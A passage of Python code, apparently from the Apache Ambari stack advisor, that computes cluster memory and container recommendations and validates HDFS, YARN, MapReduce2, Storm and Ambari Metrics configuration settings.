zookeeper_port = self.getZKPort(services)\n for i in range(len(zookeeper_hosts)):\n zookeeper_host_port_arr.append(zookeeper_hosts[i] + ':' + zookeeper_port)\n else:\n for i in range(len(zookeeper_hosts)):\n zookeeper_host_port_arr.append(zookeeper_hosts[i])\n\n zookeeper_host_port = \",\".join(zookeeper_host_port_arr)\n return zookeeper_host_port\n\n def getZKPort(self, services):\n zookeeper_port = '2181' #default port\n if 'zoo.cfg' in services['configurations'] and ('clientPort' in services['configurations']['zoo.cfg']['properties']):\n zookeeper_port = services['configurations']['zoo.cfg']['properties']['clientPort']\n return zookeeper_port\n\n def getConfigurationClusterSummary(self, servicesList, hosts, components, services):\n\n hBaseInstalled = False\n if 'HBASE' in servicesList:\n hBaseInstalled = True\n\n cluster = {\n \"cpu\": 0,\n \"disk\": 0,\n \"ram\": 0,\n \"hBaseInstalled\": hBaseInstalled,\n \"components\": components\n }\n\n if len(hosts[\"items\"]) > 0:\n nodeManagerHosts = self.getHostsWithComponent(\"YARN\", \"NODEMANAGER\", services, hosts)\n # NodeManager host with least memory is generally used in calculations as it will work in larger hosts.\n if nodeManagerHosts is not None and len(nodeManagerHosts) > 0:\n nodeManagerHost = nodeManagerHosts[0];\n for nmHost in nodeManagerHosts:\n if nmHost[\"Hosts\"][\"total_mem\"] < nodeManagerHost[\"Hosts\"][\"total_mem\"]:\n nodeManagerHost = nmHost\n host = nodeManagerHost[\"Hosts\"]\n cluster[\"referenceNodeManagerHost\"] = host\n else:\n host = hosts[\"items\"][0][\"Hosts\"]\n cluster[\"referenceHost\"] = host\n cluster[\"cpu\"] = host[\"cpu_count\"]\n cluster[\"disk\"] = len(host[\"disk_info\"])\n cluster[\"ram\"] = int(host[\"total_mem\"] / (1024 * 1024))\n\n ramRecommendations = [\n {\"os\":1, \"hbase\":1},\n {\"os\":2, \"hbase\":1},\n {\"os\":2, \"hbase\":2},\n {\"os\":4, \"hbase\":4},\n {\"os\":6, \"hbase\":8},\n {\"os\":8, \"hbase\":8},\n {\"os\":8, \"hbase\":8},\n {\"os\":12, \"hbase\":16},\n {\"os\":24, \"hbase\":24},\n {\"os\":32, \"hbase\":32},\n {\"os\":64, \"hbase\":32}\n ]\n index = {\n cluster[\"ram\"] <= 4: 0,\n 4 < cluster[\"ram\"] <= 8: 1,\n 8 < cluster[\"ram\"] <= 16: 2,\n 16 < cluster[\"ram\"] <= 24: 3,\n 24 < cluster[\"ram\"] <= 48: 4,\n 48 < cluster[\"ram\"] <= 64: 5,\n 64 < cluster[\"ram\"] <= 72: 6,\n 72 < cluster[\"ram\"] <= 96: 7,\n 96 < cluster[\"ram\"] <= 128: 8,\n 128 < cluster[\"ram\"] <= 256: 9,\n 256 < cluster[\"ram\"]: 10\n }[1]\n\n\n cluster[\"reservedRam\"] = ramRecommendations[index][\"os\"]\n cluster[\"hbaseRam\"] = ramRecommendations[index][\"hbase\"]\n\n\n cluster[\"minContainerSize\"] = {\n cluster[\"ram\"] <= 4: 256,\n 4 < cluster[\"ram\"] <= 8: 512,\n 8 < cluster[\"ram\"] <= 24: 1024,\n 24 < cluster[\"ram\"]: 2048\n }[1]\n\n totalAvailableRam = cluster[\"ram\"] - cluster[\"reservedRam\"]\n if cluster[\"hBaseInstalled\"]:\n totalAvailableRam -= cluster[\"hbaseRam\"]\n cluster[\"totalAvailableRam\"] = max(512, totalAvailableRam * 1024)\n '''containers = max(3, min (2*cores,min (1.8*DISKS,(Total available RAM) / MIN_CONTAINER_SIZE))))'''\n cluster[\"containers\"] = round(max(3,\n min(2 * cluster[\"cpu\"],\n min(ceil(1.8 * cluster[\"disk\"]),\n cluster[\"totalAvailableRam\"] / cluster[\"minContainerSize\"]))))\n\n '''ramPerContainers = max(2GB, RAM - reservedRam - hBaseRam) / containers'''\n cluster[\"ramPerContainer\"] = abs(cluster[\"totalAvailableRam\"] / cluster[\"containers\"])\n '''If greater than 1GB, value will be in multiples of 512.'''\n if cluster[\"ramPerContainer\"] > 1024:\n cluster[\"ramPerContainer\"] = int(cluster[\"ramPerContainer\"] / 512) * 512\n\n cluster[\"mapMemory\"] = int(cluster[\"ramPerContainer\"])\n cluster[\"reduceMemory\"] = cluster[\"ramPerContainer\"]\n cluster[\"amMemory\"] = max(cluster[\"mapMemory\"], cluster[\"reduceMemory\"])\n\n return cluster\n\n def getServiceConfigurationValidators(self):\n return {\n \"HDFS\": { \"hdfs-site\": self.validateHDFSConfigurations,\n \"hadoop-env\": self.validateHDFSConfigurationsEnv},\n \"MAPREDUCE2\": {\"mapred-site\": self.validateMapReduce2Configurations},\n \"YARN\": {\"yarn-site\": self.validateYARNConfigurations,\n \"yarn-env\": self.validateYARNEnvConfigurations},\n \"HBASE\": {\"hbase-env\": self.validateHbaseEnvConfigurations},\n \"STORM\": {\"storm-site\": self.validateStormConfigurations},\n \"AMBARI_METRICS\": {\"ams-hbase-site\": self.validateAmsHbaseSiteConfigurations,\n \"ams-hbase-env\": self.validateAmsHbaseEnvConfigurations,\n \"ams-site\": self.validateAmsSiteConfigurations}\n }\n\n def validateMinMax(self, items, recommendedDefaults, configurations):\n\n # required for casting to the proper numeric type before comparison\n def convertToNumber(number):\n try:\n return int(number)\n except ValueError:\n return float(number)\n\n for configName in configurations:\n validationItems = []\n if configName in recommendedDefaults and \"property_attributes\" in recommendedDefaults[configName]:\n for propertyName in recommendedDefaults[configName][\"property_attributes\"]:\n if propertyName in configurations[configName][\"properties\"]:\n if \"maximum\" in recommendedDefaults[configName][\"property_attributes\"][propertyName] and \\\n propertyName in recommendedDefaults[configName][\"properties\"]:\n userValue = convertToNumber(configurations[configName][\"properties\"][propertyName])\n maxValue = convertToNumber(recommendedDefaults[configName][\"property_attributes\"][propertyName][\"maximum\"])\n if userValue > maxValue:\n validationItems.extend([{\"config-name\": propertyName, \"item\": self.getWarnItem(\"Value is greater than the recommended maximum of {0} \".format(maxValue))}])\n if \"minimum\" in recommendedDefaults[configName][\"property_attributes\"][propertyName] and \\\n propertyName in recommendedDefaults[configName][\"properties\"]:\n userValue = convertToNumber(configurations[configName][\"properties\"][propertyName])\n minValue = convertToNumber(recommendedDefaults[configName][\"property_attributes\"][propertyName][\"minimum\"])\n if userValue < minValue:\n validationItems.extend([{\"config-name\": propertyName, \"item\": self.getWarnItem(\"Value is less than the recommended minimum of {0} \".format(minValue))}])\n items.extend(self.toConfigurationValidationProblems(validationItems, configName))\n pass\n\n def validateAmsSiteConfigurations(self, properties, recommendedDefaults, configurations, services, hosts):\n validationItems = []\n\n op_mode = properties.get(\"timeline.metrics.service.operation.mode\")\n correct_op_mode_item = None\n if op_mode not in (\"embedded\", \"distributed\"):\n correct_op_mode_item = self.getErrorItem(\"Correct value should be set.\")\n pass\n\n validationItems.extend([{\"config-name\":'timeline.metrics.service.operation.mode', \"item\": correct_op_mode_item }])\n return self.toConfigurationValidationProblems(validationItems, \"ams-site\")\n\n def validateAmsHbaseSiteConfigurations(self, properties, recommendedDefaults, configurations, services, hosts):\n\n amsCollectorHosts = self.getComponentHostNames(services, \"AMBARI_METRICS\", \"METRICS_COLLECTOR\")\n ams_site = getSiteProperties(configurations, \"ams-site\")\n core_site = getSiteProperties(configurations, \"core-site\")\n\n collector_heapsize, hbase_heapsize, total_sinks_count = self.getAmsMemoryRecommendation(services, hosts)\n recommendedDiskSpace = 10485760\n # TODO validate configuration for multiple AMBARI_METRICS collectors\n if len(amsCollectorHosts) > 1:\n pass\n else:\n if total_sinks_count > 2000:\n recommendedDiskSpace = 104857600 # * 1k == 100 Gb\n elif total_sinks_count > 500:\n recommendedDiskSpace = 52428800 # * 1k == 50 Gb\n elif total_sinks_count > 250:\n recommendedDiskSpace = 20971520 # * 1k == 20 Gb\n\n validationItems = []\n\n rootdir_item = None\n op_mode = ams_site.get(\"timeline.metrics.service.operation.mode\")\n default_fs = core_site.get(\"fs.defaultFS\") if core_site else \"file:///\"\n hbase_rootdir = properties.get(\"hbase.rootdir\")\n hbase_tmpdir = properties.get(\"hbase.tmp.dir\")\n distributed = properties.get(\"hbase.cluster.distributed\")\n is_local_root_dir = hbase_rootdir.startswith(\"file://\") or (default_fs.startswith(\"file://\") and hbase_rootdir.startswith(\"/\"))\n\n if op_mode == \"distributed\" and is_local_root_dir:\n rootdir_item = self.getWarnItem(\"In distributed mode hbase.rootdir should point to HDFS.\")\n elif op_mode == \"embedded\":\n if distributed.lower() == \"false\" and hbase_rootdir.startswith('/') or hbase_rootdir.startswith(\"hdfs://\"):\n rootdir_item = self.getWarnItem(\"In embedded mode hbase.rootdir cannot point to schemaless values or HDFS, \"\n \"Example - file:// for localFS\")\n pass\n\n distributed_item = None\n if op_mode == \"distributed\" and not distributed.lower() == \"true\":\n distributed_item = self.getErrorItem(\"hbase.cluster.distributed property should be set to true for \"\n \"distributed mode\")\n if op_mode == \"embedded\" and distributed.lower() == \"true\":\n distributed_item = self.getErrorItem(\"hbase.cluster.distributed property should be set to false for embedded mode\")\n\n hbase_zk_client_port = properties.get(\"hbase.zookeeper.property.clientPort\")\n zkPort = self.getZKPort(services)\n hbase_zk_client_port_item = None\n if distributed.lower() == \"true\" and op_mode == \"distributed\" and \\\n hbase_zk_client_port != zkPort and hbase_zk_client_port != \"{{zookeeper_clientPort}}\":\n hbase_zk_client_port_item = self.getErrorItem(\"In AMS distributed mode, hbase.zookeeper.property.clientPort \"\n \"should be the cluster zookeeper server port : {0}\".format(zkPort))\n\n if distributed.lower() == \"false\" and op_mode == \"embedded\" and \\\n hbase_zk_client_port == zkPort and hbase_zk_client_port != \"{{zookeeper_clientPort}}\":\n hbase_zk_client_port_item = self.getErrorItem(\"In AMS embedded mode, hbase.zookeeper.property.clientPort \"\n \"should be a different port than cluster zookeeper port.\"\n \"(default:61181)\")\n\n validationItems.extend([{\"config-name\":'hbase.rootdir', \"item\": rootdir_item },\n {\"config-name\":'hbase.cluster.distributed', \"item\": distributed_item },\n {\"config-name\":'hbase.zookeeper.property.clientPort', \"item\": hbase_zk_client_port_item }])\n\n for collectorHostName in amsCollectorHosts:\n for host in hosts[\"items\"]:\n if host[\"Hosts\"][\"host_name\"] == collectorHostName:\n if op_mode == 'embedded' or is_local_root_dir:\n validationItems.extend([{\"config-name\": 'hbase.rootdir', \"item\": self.validatorEnoughDiskSpace(properties, 'hbase.rootdir', host[\"Hosts\"], recommendedDiskSpace)}])\n validationItems.extend([{\"config-name\": 'hbase.rootdir', \"item\": self.validatorNotRootFs(properties, recommendedDefaults, 'hbase.rootdir', host[\"Hosts\"])}])\n validationItems.extend([{\"config-name\": 'hbase.tmp.dir', \"item\": self.validatorNotRootFs(properties, recommendedDefaults, 'hbase.tmp.dir', host[\"Hosts\"])}])\n\n dn_hosts = self.getComponentHostNames(services, \"HDFS\", \"DATANODE\")\n if is_local_root_dir:\n mountPoints = []\n for mountPoint in host[\"Hosts\"][\"disk_info\"]:\n mountPoints.append(mountPoint[\"mountpoint\"])\n hbase_rootdir_mountpoint = getMountPointForDir(hbase_rootdir, mountPoints)\n hbase_tmpdir_mountpoint = getMountPointForDir(hbase_tmpdir, mountPoints)\n preferred_mountpoints = self.getPreferredMountPoints(host['Hosts'])\n # hbase.rootdir and hbase.tmp.dir shouldn't point to the same partition\n # if multiple preferred_mountpoints exist\n if hbase_rootdir_mountpoint == hbase_tmpdir_mountpoint and \\\n len(preferred_mountpoints) > 1:\n item = self.getWarnItem(\"Consider not using {0} partition for storing metrics temporary data. \"\n \"{0} partition is already used as hbase.rootdir to store metrics data\".format(hbase_tmpdir_mountpoint))\n validationItems.extend([{\"config-name\":'hbase.tmp.dir', \"item\": item}])\n\n # if METRICS_COLLECTOR is co-hosted with DATANODE\n # cross-check dfs.datanode.data.dir and hbase.rootdir\n # they shouldn't share same disk partition IO\n hdfs_site = getSiteProperties(configurations, \"hdfs-site\")\n dfs_datadirs = hdfs_site.get(\"dfs.datanode.data.dir\").split(\",\") if hdfs_site and \"dfs.datanode.data.dir\" in hdfs_site else []\n if dn_hosts and collectorHostName in dn_hosts and ams_site and \\\n dfs_datadirs and len(preferred_mountpoints) > len(dfs_datadirs):\n for dfs_datadir in dfs_datadirs:\n dfs_datadir_mountpoint = getMountPointForDir(dfs_datadir, mountPoints)\n if dfs_datadir_mountpoint == hbase_rootdir_mountpoint:\n item = self.getWarnItem(\"Consider not using {0} partition for storing metrics data. \"\n \"{0} is already used by datanode to store HDFS data\".format(hbase_rootdir_mountpoint))\n validationItems.extend([{\"config-name\": 'hbase.rootdir', \"item\": item}])\n break\n # If no local DN in distributed mode\n elif collectorHostName not in dn_hosts and distributed.lower() == \"true\":\n item = self.getWarnItem(\"It's recommended to install Datanode component on {0} \"\n \"to speed up IO operations between HDFS and Metrics \"\n \"Collector in distributed mode \".format(collectorHostName))\n validationItems.extend([{\"config-name\": \"hbase.cluster.distributed\", \"item\": item}])\n # Short circuit read should be enabled in distibuted mode\n # if local DN installed\n else:\n validationItems.extend([{\"config-name\": \"dfs.client.read.shortcircuit\", \"item\": self.validatorEqualsToRecommendedItem(properties, recommendedDefaults, \"dfs.client.read.shortcircuit\")}])\n\n return self.toConfigurationValidationProblems(validationItems, \"ams-hbase-site\")\n\n def validateStormConfigurations(self, properties, recommendedDefaults, configurations, services, hosts):\n validationItems = []\n servicesList = [service[\"StackServices\"][\"service_name\"] for service in services[\"services\"]]\n # Storm AMS integration\n if 'AMBARI_METRICS' in servicesList and \"metrics.reporter.register\" in properties and \\\n \"org.apache.hadoop.metrics2.sink.storm.StormTimelineMetricsReporter\" not in properties.get(\"metrics.reporter.register\"):\n\n validationItems.append({\"config-name\": 'metrics.reporter.register',\n \"item\": self.getWarnItem(\n \"Should be set to org.apache.hadoop.metrics2.sink.storm.StormTimelineMetricsReporter to report the metrics to Ambari Metrics service.\")})\n\n return self.toConfigurationValidationProblems(validationItems, \"storm-site\")\n\n def validateAmsHbaseEnvConfigurations(self, properties, recommendedDefaults, configurations, services, hosts):\n\n ams_env = getSiteProperties(configurations, \"ams-env\")\n amsHbaseSite = getSiteProperties(configurations, \"ams-hbase-site\")\n validationItems = []\n mb = 1024 * 1024\n gb = 1024 * mb\n\n regionServerItem = self.validatorLessThenDefaultValue(properties, recommendedDefaults, \"hbase_regionserver_heapsize\") ## FIXME if new service added\n if regionServerItem:\n validationItems.extend([{\"config-name\": \"hbase_regionserver_heapsize\", \"item\": regionServerItem}])\n\n hbaseMasterHeapsizeItem = self.validatorLessThenDefaultValue(properties, recommendedDefaults, \"hbase_master_heapsize\")\n if hbaseMasterHeapsizeItem:\n validationItems.extend([{\"config-name\": \"hbase_master_heapsize\", \"item\": hbaseMasterHeapsizeItem}])\n\n logDirItem = self.validatorEqualsPropertyItem(properties, \"hbase_log_dir\", ams_env, \"metrics_collector_log_dir\")\n if logDirItem:\n validationItems.extend([{\"config-name\": \"hbase_log_dir\", \"item\": logDirItem}])\n\n collector_heapsize = to_number(ams_env.get(\"metrics_collector_heapsize\"))\n hbase_master_heapsize = to_number(properties[\"hbase_master_heapsize\"])\n hbase_master_xmn_size = to_number(properties[\"hbase_master_xmn_size\"])\n hbase_regionserver_heapsize = to_number(properties[\"hbase_regionserver_heapsize\"])\n hbase_regionserver_xmn_size = to_number(properties[\"regionserver_xmn_size\"])\n\n # Validate Xmn settings.\n masterXmnItem = None\n regionServerXmnItem = None\n is_hbase_distributed = amsHbaseSite.get(\"hbase.cluster.distributed\").lower() == 'true'\n\n if is_hbase_distributed:\n minMasterXmn = 0.12 * hbase_master_heapsize\n maxMasterXmn = 0.2 * hbase_master_heapsize\n if hbase_master_xmn_size < minMasterXmn:\n masterXmnItem = self.getWarnItem(\"Value is lesser than the recommended minimum Xmn size of {0} \"\n \"(12% of hbase_master_heapsize)\".format(int(ceil(minMasterXmn))))\n\n if hbase_master_xmn_size > maxMasterXmn:\n masterXmnItem = self.getWarnItem(\"Value is greater than the recommended maximum Xmn size of {0} \"\n \"(20% of hbase_master_heapsize)\".format(int(floor(maxMasterXmn))))\n\n minRegionServerXmn = 0.12 * hbase_regionserver_heapsize\n maxRegionServerXmn = 0.2 * hbase_regionserver_heapsize\n if hbase_regionserver_xmn_size < minRegionServerXmn:\n regionServerXmnItem = self.getWarnItem(\"Value is lesser than the recommended minimum Xmn size of {0} \"\n \"(12% of hbase_regionserver_heapsize)\"\n .format(int(ceil(minRegionServerXmn))))\n\n if hbase_regionserver_xmn_size > maxRegionServerXmn:\n regionServerXmnItem = self.getWarnItem(\"Value is greater than the recommended maximum Xmn size of {0} \"\n \"(20% of hbase_regionserver_heapsize)\"\n .format(int(floor(maxRegionServerXmn))))\n else:\n minMasterXmn = 0.12 * (hbase_master_heapsize + hbase_regionserver_heapsize)\n maxMasterXmn = 0.2 * (hbase_master_heapsize + hbase_regionserver_heapsize)\n if hbase_master_xmn_size < minMasterXmn:\n masterXmnItem = self.getWarnItem(\"Value is lesser than the recommended minimum Xmn size of {0} \"\n \"(12% of hbase_master_heapsize + hbase_regionserver_heapsize)\"\n .format(int(ceil(minMasterXmn))))\n\n if hbase_master_xmn_size > maxMasterXmn:\n masterXmnItem = self.getWarnItem(\"Value is greater than the recommended maximum Xmn size of {0} \"\n \"(20% of hbase_master_heapsize + hbase_regionserver_heapsize)\"\n .format(int(floor(maxMasterXmn))))\n if masterXmnItem:\n validationItems.extend([{\"config-name\": \"hbase_master_xmn_size\", \"item\": masterXmnItem}])\n\n if regionServerXmnItem:\n validationItems.extend([{\"config-name\": \"regionserver_xmn_size\", \"item\": regionServerXmnItem}])\n\n if hbaseMasterHeapsizeItem is None:\n hostMasterComponents = {}\n\n for service in services[\"services\"]:\n for component in service[\"components\"]:\n if component[\"StackServiceComponents\"][\"hostnames\"] is not None:\n for hostName in component[\"StackServiceComponents\"][\"hostnames\"]:\n if self.isMasterComponent(component):\n if hostName not in hostMasterComponents.keys():\n hostMasterComponents[hostName] = []\n hostMasterComponents[hostName].append(component[\"StackServiceComponents\"][\"component_name\"])\n\n amsCollectorHosts = self.getComponentHostNames(services, \"AMBARI_METRICS\", \"METRICS_COLLECTOR\")\n for collectorHostName in amsCollectorHosts:\n for host in hosts[\"items\"]:\n if host[\"Hosts\"][\"host_name\"] == collectorHostName:\n # AMS Collector co-hosted with other master components in bigger clusters\n if len(hosts['items']) > 31 and \\\n len(hostMasterComponents[collectorHostName]) > 2 and \\\n host[\"Hosts\"][\"total_mem\"] < 32*mb: # < 32Gb(total_mem in k)\n masterHostMessage = \"Host {0} is used by multiple master components ({1}). \" \\\n \"It is recommended to use a separate host for the \" \\\n \"Ambari Metrics Collector component and ensure \" \\\n \"the host has sufficient memory available.\"\n\n hbaseMasterHeapsizeItem = self.getWarnItem(masterHostMessage.format(\n collectorHostName, str(\", \".join(hostMasterComponents[collectorHostName]))))\n if hbaseMasterHeapsizeItem:\n validationItems.extend([{\"config-name\": \"hbase_master_heapsize\", \"item\": hbaseMasterHeapsizeItem}])\n\n # Check for unused RAM on AMS Collector node\n hostComponents = []\n for service in services[\"services\"]:\n for component in service[\"components\"]:\n if component[\"StackServiceComponents\"][\"hostnames\"] is not None:\n if collectorHostName in component[\"StackServiceComponents\"][\"hostnames\"]:\n hostComponents.append(component[\"StackServiceComponents\"][\"component_name\"])\n\n requiredMemory = getMemorySizeRequired(hostComponents, configurations)\n unusedMemory = host[\"Hosts\"][\"total_mem\"] * 1024 - requiredMemory # in bytes\n if unusedMemory > 4*gb: # warn user, if more than 4GB RAM is unused\n heapPropertyToIncrease = \"hbase_regionserver_heapsize\" if is_hbase_distributed else \"hbase_master_heapsize\"\n xmnPropertyToIncrease = \"regionserver_xmn_size\" if is_hbase_distributed else \"hbase_master_xmn_size\"\n recommended_collector_heapsize = int((unusedMemory - 4*gb)/5) + collector_heapsize*mb\n recommended_hbase_heapsize = int((unusedMemory - 4*gb)*4/5) + to_number(properties.get(heapPropertyToIncrease))*mb\n recommended_hbase_heapsize = min(32*gb, recommended_hbase_heapsize) #Make sure heapsize <= 32GB\n recommended_xmn_size = round_to_n(0.12*recommended_hbase_heapsize/mb,128)\n\n if collector_heapsize < recommended_collector_heapsize or \\\n to_number(properties[heapPropertyToIncrease]) < recommended_hbase_heapsize:\n collectorHeapsizeItem = self.getWarnItem(\"{0} MB RAM is unused on the host {1} based on components \" \\\n \"assigned. Consider allocating {2} MB to \" \\\n \"metrics_collector_heapsize in ams-env, \" \\\n \"{3} MB to {4} in ams-hbase-env\"\n .format(unusedMemory/mb, collectorHostName,\n recommended_collector_heapsize/mb,\n recommended_hbase_heapsize/mb,\n heapPropertyToIncrease))\n validationItems.extend([{\"config-name\": heapPropertyToIncrease, \"item\": collectorHeapsizeItem}])\n\n if to_number(properties[xmnPropertyToIncrease]) < recommended_hbase_heapsize:\n xmnPropertyToIncreaseItem = self.getWarnItem(\"Consider allocating {0} MB to use up some unused memory \"\n \"on host\".format(recommended_xmn_size))\n validationItems.extend([{\"config-name\": xmnPropertyToIncrease, \"item\": xmnPropertyToIncreaseItem}])\n pass\n\n return self.toConfigurationValidationProblems(validationItems, \"ams-hbase-env\")\n\n\n def getPreferredMountPoints(self, hostInfo):\n\n # '/etc/resolv.conf', '/etc/hostname', '/etc/hosts' are docker specific mount points\n undesirableMountPoints = [\"/\", \"/home\", \"/etc/resolv.conf\", \"/etc/hosts\",\n \"/etc/hostname\", \"/tmp\"]\n undesirableFsTypes = [\"devtmpfs\", \"tmpfs\", \"vboxsf\", \"CDFS\"]\n mountPoints = []\n if hostInfo and \"disk_info\" in hostInfo:\n mountPointsDict = {}\n for mountpoint in hostInfo[\"disk_info\"]:\n if not (mountpoint[\"mountpoint\"] in undesirableMountPoints or\n mountpoint[\"mountpoint\"].startswith((\"/boot\", \"/mnt\")) or\n mountpoint[\"type\"] in undesirableFsTypes or\n mountpoint[\"available\"] == str(0)):\n mountPointsDict[mountpoint[\"mountpoint\"]] = to_number(mountpoint[\"available\"])\n if mountPointsDict:\n mountPoints = sorted(mountPointsDict, key=mountPointsDict.get, reverse=True)\n mountPoints.append(\"/\")\n return mountPoints\n\n def validatorNotRootFs(self, properties, recommendedDefaults, propertyName, hostInfo):\n if not propertyName in properties:\n return self.getErrorItem(\"Value should be set\")\n dir = properties[propertyName]\n if not dir.startswith(\"file://\") or dir == recommendedDefaults.get(propertyName):\n return None\n\n dir = re.sub(\"^file://\", \"\", dir, count=1)\n mountPoints = []\n for mountPoint in hostInfo[\"disk_info\"]:\n mountPoints.append(mountPoint[\"mountpoint\"])\n mountPoint = getMountPointForDir(dir, mountPoints)\n\n if \"/\" == mountPoint and self.getPreferredMountPoints(hostInfo)[0] != mountPoint:\n return self.getWarnItem(\"It is not recommended to use root partition for {0}\".format(propertyName))\n\n return None\n\n def validatorEnoughDiskSpace(self, properties, propertyName, hostInfo, reqiuredDiskSpace):\n if not propertyName in properties:\n return self.getErrorItem(\"Value should be set\")\n dir = properties[propertyName]\n if not dir.startswith(\"file://\"):\n return None\n\n dir = re.sub(\"^file://\", \"\", dir, count=1)\n mountPoints = {}\n for mountPoint in hostInfo[\"disk_info\"]:\n mountPoints[mountPoint[\"mountpoint\"]] = to_number(mountPoint[\"available\"])\n mountPoint = getMountPointForDir(dir, mountPoints.keys())\n\n if not mountPoints:\n return self.getErrorItem(\"No disk info found on host %s\" % hostInfo[\"host_name\"])\n\n if mountPoints[mountPoint] < reqiuredDiskSpace:\n msg = \"Ambari Metrics disk space requirements not met. \\n\" \\\n \"Recommended disk space for partition {0} is {1}G\"\n return self.getWarnItem(msg.format(mountPoint, reqiuredDiskSpace/1048576)) # in Gb\n return None\n\n def validatorLessThenDefaultValue(self, properties, recommendedDefaults, propertyName):\n if propertyName not in recommendedDefaults:\n # If a property name exists in say hbase-env and hbase-site (which is allowed), then it will exist in the\n # \"properties\" dictionary, but not necessarily in the \"recommendedDefaults\" dictionary\". In this case, ignore it.\n return None\n\n if not propertyName in properties:\n return self.getErrorItem(\"Value should be set\")\n value = to_number(properties[propertyName])\n if value is None:\n return self.getErrorItem(\"Value should be integer\")\n defaultValue = to_number(recommendedDefaults[propertyName])\n if defaultValue is None:\n return None\n if value < defaultValue:\n return self.getWarnItem(\"Value is less than the recommended default of {0}\".format(defaultValue))\n return None\n\n def validatorEqualsPropertyItem(self, properties1, propertyName1,\n properties2, propertyName2,\n emptyAllowed=False):\n if not propertyName1 in properties1:\n return self.getErrorItem(\"Value should be set for %s\" % propertyName1)\n if not propertyName2 in properties2:\n return self.getErrorItem(\"Value should be set for %s\" % propertyName2)\n value1 = properties1.get(propertyName1)\n if value1 is None and not emptyAllowed:\n return self.getErrorItem(\"Empty value for %s\" % propertyName1)\n value2 = properties2.get(propertyName2)\n if value2 is None and not emptyAllowed:\n return self.getErrorItem(\"Empty value for %s\" % propertyName2)\n if value1 != value2:\n return self.getWarnItem(\"It is recommended to set equal values \"\n \"for properties {0} and {1}\".format(propertyName1, propertyName2))\n\n return None\n\n def validatorEqualsToRecommendedItem(self, properties, recommendedDefaults,\n propertyName):\n if not propertyName in properties:\n return self.getErrorItem(\"Value should be set for %s\" % propertyName)\n value = properties.get(propertyName)\n if not propertyName in recommendedDefaults:\n return self.getErrorItem(\"Value should be recommended for %s\" % propertyName)\n recommendedValue = recommendedDefaults.get(propertyName)\n if value != recommendedValue:\n return self.getWarnItem(\"It is recommended to set value {0} \"\n \"for property {1}\".format(recommendedValue, propertyName))\n return None\n\n def validateMinMemorySetting(self, properties, defaultValue, propertyName):\n if not propertyName in properties:\n return self.getErrorItem(\"Value should be set\")\n if defaultValue is None:\n return self.getErrorItem(\"Config's default value can't be null or undefined\")\n\n value = properties[propertyName]\n if value is None:\n return self.getErrorItem(\"Value can't be null or undefined\")\n try:\n valueInt = to_number(value)\n # TODO: generify for other use cases\n defaultValueInt = int(str(defaultValue).strip())\n if valueInt < defaultValueInt:\n return self.getWarnItem(\"Value is less than the minimum recommended default of -Xmx\" + str(defaultValue))\n except:\n return None\n\n return None\n\n def validatorYarnQueue(self, properties, recommendedDefaults, propertyName, services):\n if propertyName not in properties:\n return self.getErrorItem(\"Value should be set\")\n\n capacity_scheduler_properties, _ = self.getCapacitySchedulerProperties(services)\n leaf_queue_names = self.getAllYarnLeafQueues(capacity_scheduler_properties)\n queue_name = properties[propertyName]\n\n if len(leaf_queue_names) == 0:\n return None\n elif queue_name not in leaf_queue_names:\n return self.getErrorItem(\"Queue is not exist or not corresponds to existing YARN leaf queue\")\n\n return None\n\n def recommendYarnQueue(self, services, catalog_name=None, queue_property=None):\n old_queue_name = None\n\n if services and 'configurations' in services:\n configurations = services[\"configurations\"]\n if catalog_name in configurations and queue_property in configurations[catalog_name][\"properties\"]:\n old_queue_name = configurations[catalog_name][\"properties\"][queue_property]\n\n capacity_scheduler_properties, _ = self.getCapacitySchedulerProperties(services)\n leaf_queues = sorted(self.getAllYarnLeafQueues(capacity_scheduler_properties))\n\n if leaf_queues and (old_queue_name is None or old_queue_name not in leaf_queues):\n return leaf_queues.pop()\n elif old_queue_name and old_queue_name in leaf_queues:\n return None\n\n return \"default\"\n\n def validateXmxValue(self, properties, recommendedDefaults, propertyName):\n if not propertyName in properties:\n return self.getErrorItem(\"Value should be set\")\n value = properties[propertyName]\n defaultValue = recommendedDefaults[propertyName]\n if defaultValue is None:\n return self.getErrorItem(\"Config's default value can't be null or undefined\")\n if not checkXmxValueFormat(value) and checkXmxValueFormat(defaultValue):\n # Xmx is in the default-value but not the value, should be an error\n return self.getErrorItem('Invalid value format')\n if not checkXmxValueFormat(defaultValue):\n # if default value does not contain Xmx, then there is no point in validating existing value\n return None\n valueInt = formatXmxSizeToBytes(getXmxSize(value))\n defaultValueXmx = getXmxSize(defaultValue)\n defaultValueInt = formatXmxSizeToBytes(defaultValueXmx)\n if valueInt < defaultValueInt:\n return self.getWarnItem(\"Value is less than the recommended default of -Xmx\" + defaultValueXmx)\n return None\n\n def validateMapReduce2Configurations(self, properties, recommendedDefaults, configurations, services, hosts):\n validationItems = [ {\"config-name\": 'mapreduce.map.java.opts', \"item\": self.validateXmxValue(properties, recommendedDefaults, 'mapreduce.map.java.opts')},\n {\"config-name\": 'mapreduce.reduce.java.opts', \"item\": self.validateXmxValue(properties, recommendedDefaults, 'mapreduce.reduce.java.opts')},\n {\"config-name\": 'mapreduce.task.io.sort.mb', \"item\": self.validatorLessThenDefaultValue(properties, recommendedDefaults, 'mapreduce.task.io.sort.mb')},\n {\"config-name\": 'mapreduce.map.memory.mb', \"item\": self.validatorLessThenDefaultValue(properties, recommendedDefaults, 'mapreduce.map.memory.mb')},\n {\"config-name\": 'mapreduce.reduce.memory.mb', \"item\": self.validatorLessThenDefaultValue(properties, recommendedDefaults, 'mapreduce.reduce.memory.mb')},\n {\"config-name\": 'yarn.app.mapreduce.am.resource.mb', \"item\": self.validatorLessThenDefaultValue(properties, recommendedDefaults, 'yarn.app.mapreduce.am.resource.mb')},\n {\"config-name\": 'yarn.app.mapreduce.am.command-opts', \"item\": self.validateXmxValue(properties, recommendedDefaults, 'yarn.app.mapreduce.am.command-opts')},\n {\"config-name\": 'mapreduce.job.queuename', \"item\": self.validatorYarnQueue(properties, recommendedDefaults, 'mapreduce.job.queuename', services)} ]\n return self.toConfigurationValidationProblems(validationItems, \"mapred-site\")\n\n def validateYARNConfigurations(self, properties, recommendedDefaults, configurations, services, hosts):\n clusterEnv = getSiteProperties(configurations, \"cluster-env\")\n validationItems = [ {\"config-name\": 'yarn.nodemanager.resource.memory-mb', \"item\": self.validatorLessThenDefaultValue(properties, recommendedDefaults, 'yarn.nodemanager.resource.memory-mb')},\n {\"config-name\": 'yarn.scheduler.minimum-allocation-mb', \"item\": self.validatorLessThenDefaultValue(properties, recommendedDefaults, 'yarn.scheduler.minimum-allocation-mb')},\n {\"config-name\": 